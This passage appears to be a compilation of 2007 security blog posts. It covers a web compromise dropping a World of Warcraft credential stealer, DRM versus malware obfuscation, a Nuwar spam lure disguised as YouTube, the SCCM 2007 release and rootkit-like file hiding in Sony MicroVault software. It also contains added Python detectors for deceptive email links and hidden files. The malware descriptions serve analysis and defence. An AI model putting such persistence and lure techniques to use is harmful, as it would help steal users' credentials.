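Because the decoder is a separate program rather than a modified copy of the hostile script, there is no risk of the original Execute lines being left in by mistake; the wscript.echo approach in the post works too, but a nested Execute inside the decoded layer (as in the "cde" string here) is then one copy-and-paste away from running.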
 
Without being noticed, the code then downloads ltts.exe from the same server and executes it on the victim system. On August 25th, the malware had a SHA1 hash of c1cbee89ba1033b8e739067eab086f70b476c5aa and was about 50 kb in size. Five days after the compromise took place, the binary was detected by 9 out of 32 anti-virus solutions. Note that it’s quite common for people running such malicious web server to change their malcode every so often as to reduce the risk of getting detected by anti-virus.
 
Once run on a system, the software drops a number of executables and installs one of them as a userinit value under the winlogon process. This makes for one of those pesky, difficult-to-remove pieces of spyware. In the end its final goal appears to be the gathering of World of Warcraft authentication credentials.
 
If you're still wondering why these are so prized, run this small google query. On-line games have recently seen the rise of so-called Real Money Transactions - yes, real money you can lose by getting compromised and others can gain. Blizzard, the WoW developer, strongly discourages this practice, but something of value to a player can always be sold on other markets.

So this leaves me wondering why exactly this was a non-malicious compromise?

--
Maarten Van Horenbeeck

Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

That made up my mind, I am not buying this game... 

Digital Reality Misunderstanding

Friday August 24, 2007 at 10:36 am CST
Posted by Seth Purdy

Trackback

The Tuesday release of the much anticipated computer game BioShock has quickly turned up another clash between enthusiastic customers and the interests of publishers and copyright control. Reports indicate that the PC versions of the game, whether purchased on physical DVD media or via the Steam online distribution service, utilize a DRM scheme that limits the number of installations possible with a given license key. The apparent limit of two (due to customer uproar it appears this number is being raised to five) installations per license poses hurdles for users facing frequent system upgrades or recovery from system failures.

Interestingly, content owners and publishers face the same fundamental conundrum in implementing DRM as malware writers do in attempting to encrypt or otherwise obfuscate the code of their creations. The crux of it is this: If, in the end, you need to actually run code or play media content, there will necessarily be a time at which it runs in the original, unprotected form.

For the DRM case, let's take commercial movies as an example. The data on DVDs, HD-DVDs, and Blu-ray discs is encrypted. But ultimately you need to get the original, unencrypted data onto a display device. There's simply no way around it. The player itself handles the initial decryption. Setting aside the flaws uncovered in the CSS and, more recently, AACS implementations, that was generally sufficient until purely digital displays and connections became more prevalent. At that point there was a risk of perfect digital duplication by simply sampling the unencrypted output from a player. HDCP is a clever attempt to plug that hole. It establishes an encrypted link between the player and display, moving the point at which the digital data is in its "raw" unprotected state as close as possible to the final output stage (within the processing electronics of the display itself), thus making digital duplication of the unprotected content more difficult. But still, the final unencrypted data has to be produced on the customer's equipment for viewing. As such, an HDCP-compliant device could be constructed to gain access to that data and copy it.

In the case of BioShock it’s not raw media content being decrypted and displayed, but the act of allowing the game to run. At some point, after whatever checks or validation schemes are used, the customer needs to be able to actually play the game. As long as that path leads to the eventual successful launch of the game (all the data and resources needed for it to run are already on the system once it’s installed), it is possible to find a way to circumvent it and cut the DRM controls out of the picture.

Malware writers face a similar challenge when trying to obscure the code of their creations from security software using packers or encryption. Try as they might, they can’t get around the hard fact that they ultimately need to execute their original unobfuscated machine code. To do that, it has to exist in that state on the system at some point, even if as only one instruction at a time in memory. And since that’s true, we’ll always have a basic opportunity to get at it (though this is more difficult in some cases than in others).

Although the copyright lawyers may wish it otherwise, it’s a zero-sum game between usability and control. The only way to absolutely ensure that publicly distributed media content won’t be pirated, software won’t be run in an unauthorized way, or native code be accessed and identified is to encrypt the entire thing using a very strong algorithm with a highly random key, and then delete or never reveal that key to anyone. Did I say “absolutely”? That’s not quite right. The encryption algorithm or key chosen may have an unknown weakness that could later be revealed, so the only guaranteed solution is not to release the data at all! Of course, for a commercial product that would present a bit of a challenge for the marketing department (digital Cheese Shop, anyone?) and in the case of a malware executable would render it similarly useless to the author.

Unfortunately, in the case of DRM, trying to strike a balance between some degree of control and maintaining the ability of the software or media to operate can often end up inconveniencing and angering legitimate users. Pirates, on the other hand, will happily exploit this fundamental flaw in the situation as they develop software cracks and duplication methods to circumvent the protection.

However, in the case of security software versus malware obfuscation, that same flaw ensures there will always be at least one chink in the armor for us to work on when we tackle the latest virus or Trojan.

Source: Computer Security Research - McAfee Avert Labs Blog

 

Latest Nuwar Spamming Uses YouTube Lure

Monday August 27, 2007 at 6:00 am CST
Posted by Vinoo Thomas

Trackback

McAfee Avert Labs has observed a new trend in W32/Nuwar spamming over the weekend. The authors of this malware have resorted to spamming HTML formatted emails that pretend to be from a friend sending a link to a video from YouTube. A copy of the spammed email is as follows:

Copy of spammed email

To the average computer user, the link in the email would seem perfectly legitimate, as its text points to youtube.com; but if one were to hover the mouse over the URL, it would point to a numeric IP address. This is achieved by using HTML anchor tags whose visible text differs from the href, so that what the victim sees is usually not what they get. As if forecasting the Nuwar author's next move, McAfee Avert Labs had recently blogged about the risks of using HTML formatted email.
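Detecting the trick described above (anchor text that reads like a YouTube address, an href that goes somewhere else) is mechanical once the email body is parsed. The following is an added example, not McAfee's code: a Python check that walks every anchor in an HTML body and flags those whose visible text names a different host than the href, or whose href is a bare IP address. The sample email HTML is constructed, and the address 192.0.2.10 is a documentation IP, not an indicator from the post.

```python
"""Flag deceptive links in HTML email (added example, not the blog's code).

A link is suspicious when its visible text names one host and its href
goes to another, or when the href is a bare IP address.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
# Visible text that a reader would take for an address: optional scheme,
# optional "www.", then at least one dotted label pair.
DOMAINISH_RE = re.compile(r"^(?:https?://)?(?:www\.)?([a-z0-9-]+(?:\.[a-z0-9-]+)+)", re.IGNORECASE)

# Constructed sample body: a lure link, a genuine link, and a generic "click here".
SAMPLE_EMAIL_HTML = """<html><body>
<p>Hey, check out this video I found!</p>
<a href="http://192.0.2.10/video.html">http://www.youtube.com/watch?v=constructed</a><br>
<a href="http://www.youtube.com/">www.youtube.com</a><br>
<a href="http://192.0.2.10/video.html">Click here</a>
</body></html>"""


class AnchorCollector(HTMLParser):
    """Collect (href, visible text) for every <a> element."""

    def __init__(self):
        super().__init__()
        self.anchors = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.anchors.append((self._href, "".join(self._text).strip()))
            self._href = None


def find_deceptive_links(html):
    """Return a list of {href, text, reasons} for anchors that mislead the reader."""
    parser = AnchorCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for href, text in parser.anchors:
        host = (urlparse(href).hostname or "").lower()
        reasons = []
        if IPV4_RE.match(host):
            reasons.append("href target is a bare IP address")
        shown = DOMAINISH_RE.match(text)
        if shown:
            shown_host = shown.group(1).lower()
            # Visible "youtube.com" may legitimately lead to www.youtube.com;
            # any other host is a mismatch.
            if shown_host != host and not host.endswith("." + shown_host):
                reasons.append(f"visible text names {shown_host} but href goes to {host or '<no host>'}")
        if reasons:
            findings.append({"href": href, "text": text, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_deceptive_links(SAMPLE_EMAIL_HTML):
        print(f["text"], "->", f["href"], "|", "; ".join(f["reasons"]))
```

A mail gateway or client plug-in can apply the same rule before rendering; the bare-IP check alone would have caught this campaign, while the text/href comparison also covers lures that use a look-alike domain instead of a raw address.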

Users who fall for this bait and click the link are directed to a site containing an image that imitates YouTube's logo.

Fake Site

In the background, an embedded, obfuscated JavaScript routine that attempts a cocktail of browser and application exploits is executed. If successful, the user's machine gets infected with a copy of W32/Nuwar. If the exploits fail on a fully patched machine, the malware author has used clever wording on the web page to entice users to manually download and launch the virus via good old social engineering.

With so much thought and creativity going into keeping the W32/Nuwar juggernaut rolling, it will be interesting to see how the field plays out. Remember for every counter measure, there is a counter-counter measure. We only lose if we stand still. And what would be the fun in that? ;-)

Source: Computer Security Research - McAfee Avert Labs Blog

Let the clock start ticking.... 

News Flash - System Center Configuration Manager 2007 has left the building!!!

OMG – Anderson's not dead! Look – a blog entry! Wow – how time flies. It seems like only yesterday that Brady/I were on stage at MMS, basking in the glow that was the release of SMS 2003. (I think the actual quote he used was, "wow – we should ship a product that works more often"). Ah, those were the days. We could stand in front of a room, announce we removed logon points, and get applause! Ah, the simple life… Today is the next in that line of milestones. At 4PM today 8/24, the team signed off on System Center Configuration Manager 2007 (still can't get used to that name!) and we've officially released it to manufacturing. What this team is delivering to you is the most SIGNIFICANT release in the 13 year history of the product, and I'm so proud to have been a part (albeit small as I've been working on SCCM V5 for a year now!) of the past 3+ yrs of work that has gone into it. It's significant for so many things. Sure – it's got a TON of features and functionality that we hope will help you all continue to "do more with less", "stay TechSexy" or whatever those slogans have said in the past! But it's so much more than that. It's about massive investments in making sure the quality is at the point so that you can bet your business on our ability to deliver. We made a quality mistake with you guys 8 years ago, and promised you it would never happen again. We continue with that promise. (I'll put out test stats in the next few days that will blow your mind!). It's about significant time in understanding how you'll upgrade between versions, because we know that the deployment of an enterprise systems mgmt tool is not a "next, next, next, finish (and then reboot)" activity. If you'd like, we COULD bring back "express setup" and it could be that fast! It's about a commitment to you on schedule. We set an internal schedule 2 years ago that had a bottoms-up RTM date of August, 2007. We HIT that. We know you guys (and gals April et al!) bet your tech strategies on our ability to get you a product in the right time window. We take a lot of pride in being able to deliver that for you. But, most importantly – it's about you – the 50,000 (ballpark) SMS customers and admins around the globe that continue to support us, continue to beat us up when we don't get you what you need, continue to add/extend on top of this product we provide, continue to find new business problems to solve with SMS, continue to fight battles with network and security admins to get this product installed right, continue to delight end-users by giving them services w/o them even knowing, continue to evangelize this product to your peers, continue to do what we tell you not to do (edit site control file, work direct to the database, etc), and continue to not only be our customers, but be our peers and friends. Wish you guys could all be here to share with us in this celebration (now THAT would be a party) but a lot of us will be on the road in the upcoming weeks. There is an event in Boston on 10/4, and a few of us (tough life!) will be gallivanting around Europe for MMS Best of Europe road show, culminating in our worldwide launch in Barcelona at IT Forum (yes – that other IT Forum thing!). You'll be seeing updates on ms.com with stuff about SCCM 07 early next week – but I couldn't wait that long to tell you how much we appreciate all your help in making this happen, and how we know that the battle isn't over – it's only begun – as we work together to get you guys deploying this product in the upcoming months!

Bill Anderson
Lead Program Manager
System Center Configuration Manager
Microsoft Corporation

Source: News Flash - System Center Configuration Manager 2007 has left the building!!! - The Anderson's Blog!

 

Double Whammy! Another Sony Case (And it's Not BioShock)
Posted by Mika @ 10:58 GMT


Biometrics – yes. BioShock – no.
Hypothetical: Imagine that you visit your local mall and browse around for stuff to buy. You decide to buy a new CD from your favorite artist, and on an impulse you also buy a brand new, cool USB stick thingy. You go home and stick the CD into your laptop's CD drive. It prompts you to install some software. You do so, and while you are listening to the music, you open the USB stick package and start experimenting with your new toy. It has a fingerprint reader, so you install the software for that as well. Guess what… you might have just installed not one, but two different pieces of rootkit-like software on your laptop.
We received a report that our F-Secure DeepGuard HIPS system was warning about a USB stick software driver. The USB stick in question has a built-in fingerprint reader. The case seemed unusual so we ordered a couple of USB sticks with fingerprint authentication. We installed the software on a test machine and were quite surprised to see that after installation our F-Secure BlackLight rootkit detector was reporting hidden files on the system.
BlackLight Hidden Items
Many of our regular readers will remember the huge Sony BMG XCP DRM rootkit debacle of 2005. Back then, malware using rootkits was not very common, but since then a lot of malware families have adopted rootkit cloaking techniques. It is unclear whether the "rise of the rootkit" would have happened on this scale without the publicity of the Sony BMG case. In any case, a lot more people now know what a "rootkit" is than back then.
This USB stick with rootkit-like behavior is closely related to the Sony BMG case. First of all, it is another case where rootkit-like cloaking is ill-advisedly used in commercial software. Also, the USB sticks we ordered are products of the same company — Sony Corporation.
MicroVault Boxes
The Sony MicroVault USM-F fingerprint reader software that comes with the USB stick installs a driver that hides a directory under "c:\windows\". So, when enumerating files and subdirectories in the Windows directory, the directory and the files inside it are not visible through the Windows API. If you know the name of the directory, it is possible, for example, to enter the hidden directory from the Command Prompt, and it is possible to create new hidden files there. There are also ways to run files from this directory. Files in this directory are also hidden from some antivirus scanners (as with the Sony BMG DRM case), depending on the techniques employed by the antivirus software. It is therefore technically possible for malware to use the hidden directory as a hiding place.
In addition to the software that was packaged with the USB stick, we also tested the latest software version available from Sony at www.sony.net/Products/Media/Microvault/ and this version also contains the same hiding functionality.
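BlackLight's finding rests on a cross-view comparison: enumerate the same directory through the normal Windows API, which the driver hooks, and through a channel the hook does not cover (an offline image of the volume, or a raw read of the file system), then diff the two. The following added example, which is not F-Secure's code, performs that diff on two constructed listings with Windows case-insensitive name matching, and collapses the result to the top-most hidden nodes so a cloaked directory is reported once rather than once per file beneath it. The directory name HIDDEN_DIR_PLACEHOLDER is a placeholder, since the post does not give the real one.

```python
"""Cross-view diff for hidden-file detection (added example, not F-Secure's code).

api_view: paths seen through the normal Windows API enumeration.
raw_view: paths seen through a channel the hook does not cover (offline
image or raw file-system read).  Anything in raw_view but not in api_view
is being cloaked.
"""
import ntpath

# Constructed listings.  HIDDEN_DIR_PLACEHOLDER stands in for the real
# directory name, which the post does not give.
RAW_VIEW = [
    r"C:\Windows\notepad.exe",
    r"C:\Windows\System32\kernel32.dll",
    r"C:\Windows\HIDDEN_DIR_PLACEHOLDER",
    r"C:\Windows\HIDDEN_DIR_PLACEHOLDER\template.dat",
    r"C:\Windows\HIDDEN_DIR_PLACEHOLDER\driver.sys",
]
API_VIEW = [
    r"c:\windows\notepad.exe",
    r"c:\windows\system32\KERNEL32.DLL",   # different case: same file on Windows
]


def _norm(path):
    """Windows names compare case-insensitively; normalise before diffing."""
    return ntpath.normpath(path).lower()


def cross_view_diff(api_view, raw_view):
    """Return (hidden, ghosts): raw-only paths and API-only paths, both sorted."""
    api = {_norm(p) for p in api_view}
    raw = {_norm(p) for p in raw_view}
    return sorted(raw - api), sorted(api - raw)


def hidden_roots(hidden):
    """Collapse hidden paths to their top-most nodes.

    Children of a hidden directory are hidden by implication, so report the
    directory once, with a count of what sits beneath it.
    """
    roots = {}
    for path in sorted(hidden):          # a parent sorts before its children
        parent = next((r for r in roots if path.startswith(r + "\\")), None)
        if parent is None:
            roots[path] = 0
        else:
            roots[parent] += 1
    return roots


def scan(api_view, raw_view):
    """Run the diff and summarise: cloaked roots, raw count, and API-only entries."""
    hidden, ghosts = cross_view_diff(api_view, raw_view)
    return {
        "hidden_roots": hidden_roots(hidden),
        "hidden_count": len(hidden),
        "ghosts": ghosts,   # API-only entries usually mean the two snapshots were not taken together
    }


if __name__ == "__main__":
    result = scan(API_VIEW, RAW_VIEW)
    for root, below in result["hidden_roots"].items():
        print(f"cloaked: {root}  ({below} entries beneath)")
    if result["ghosts"]:
        print("seen by API only (stale listing?):", result["ghosts"])
```

The "ghosts" list matters in practice: files created or deleted between the two enumerations show up as API-only or raw-only entries, so a scanner takes both views as close together as possible and treats a single transient mismatch differently from a whole directory that never appears through the API.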

Sony USM-F Notice

It is our belief that the MicroVault software hides this folder to somehow protect the fingerprint authentication from tampering and bypass. It is obvious that user fingerprints cannot be in a world writable file on the disk when we are talking about secure authentication. However, we feel that rootkit-like cloaking techniques are not the right way to go here. As with the Sony BMG case we, of course, contacted Sony before we decided to go public with the case. However, this time we received no reply from them.
Reading a Fingerprint
It should be noted that MicroVaults with fingerprint authentication appear to be an older product and may no longer be manufactured. At least we had some trouble finding a reader of this type in Helsinki. Nevertheless, we did manage to find them on sale.
Note that over the weekend there was news about a suspected rootkit in the PC version of the game Bioshock. This news proved not to be true, but since BioShock apparently uses copyright protection software made by Sony there was lots of initial commotion.

Source: F-Secure : News from the Lab